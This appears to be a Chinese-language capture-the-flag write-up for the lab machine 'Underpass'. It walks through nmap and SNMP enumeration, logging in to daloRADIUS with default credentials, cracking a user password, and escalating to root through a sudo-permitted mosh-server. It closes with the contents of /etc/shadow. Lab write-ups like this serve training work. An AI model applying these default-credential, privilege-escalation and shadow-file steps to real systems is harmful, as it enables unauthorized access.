基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-23 14:35 CST
Nmap scan report for 10.10.11.48
Host is up (0.086s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.88 seconds

这台机器还需要udp扫描:

1
2
3
4
5
6
7
8
9
10
11
$ sudo nmap -sU -Pn 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-23 14:44 CST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.080s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
1812/udp open|filtered radius
1813/udp open|filtered radacct

Nmap done: 1 IP address (1 host up) scanned in 1043.46 seconds

80

直接访问是apache默认页面:

SNMP

snmp可以看到underpass.htb,以及daloradius server之类信息:

daloradius

根据得到的信息添加hosts,直接尝试访问daloradius是403:

常规目录扫描:

1
2
3
4
5
6
7
8
9
10
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://underpass.htb/daloradius/

/.gitignore (Status: 200) [Size: 221]
/ChangeLog (Status: 200) [Size: 24703]
/LICENSE (Status: 200) [Size: 18011]
/app (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/app/]
/contrib (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/contrib/]
/doc (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/doc/]
/library (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/library/]
/setup (Status: 301) [Size: 325] [--> http://underpass.htb/daloradius/setup/]

路径直接访问也是403,但可以看出就是默认路径:

  • lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.
    https://github.com/lirantal/daloradius

直接参考github repo访问登录页面:

operators那里默认账号密码登录

1
administrator:radius

management->list users,可以看到用户名及密码hash,解出来密码:

1
2
3
svcMosh 412DD4759978ACFCC81DEAB01B382403

underwaterfriends

user flag

得到的账号密码ssh登录:

1
2
ssh svcMosh@10.10.11.48
underwaterfriends

提权信息

可以sudo运行mosh-server,搜索可以知道这就是一个远程终端程序,所以sudo运行的server,相当于一个root shell,使用对应客户端连接即可

提权 & root flag

运行mosh-server,使用mosh-client连接:

1
svcMosh@underpass:~$ MOSH_KEY=zTvNRaskmhEqBM5mElUeDA mosh-client 127.0.0.1 60001

shadow

1
2
root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7:::
svcMosh:$y$j9T$cK5jfCW.c6g5yvOzPF5iF1$E0geEsKPdNSCLj2wVbvftMGkbs.uJL7B0ADA41Q8Y08:20067:0:99999:7:::

参考资料

  • lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.
    https://github.com/lirantal/daloradius
  • mobile-shell/mosh: Mobile Shell
    https://github.com/mobile-shell/mosh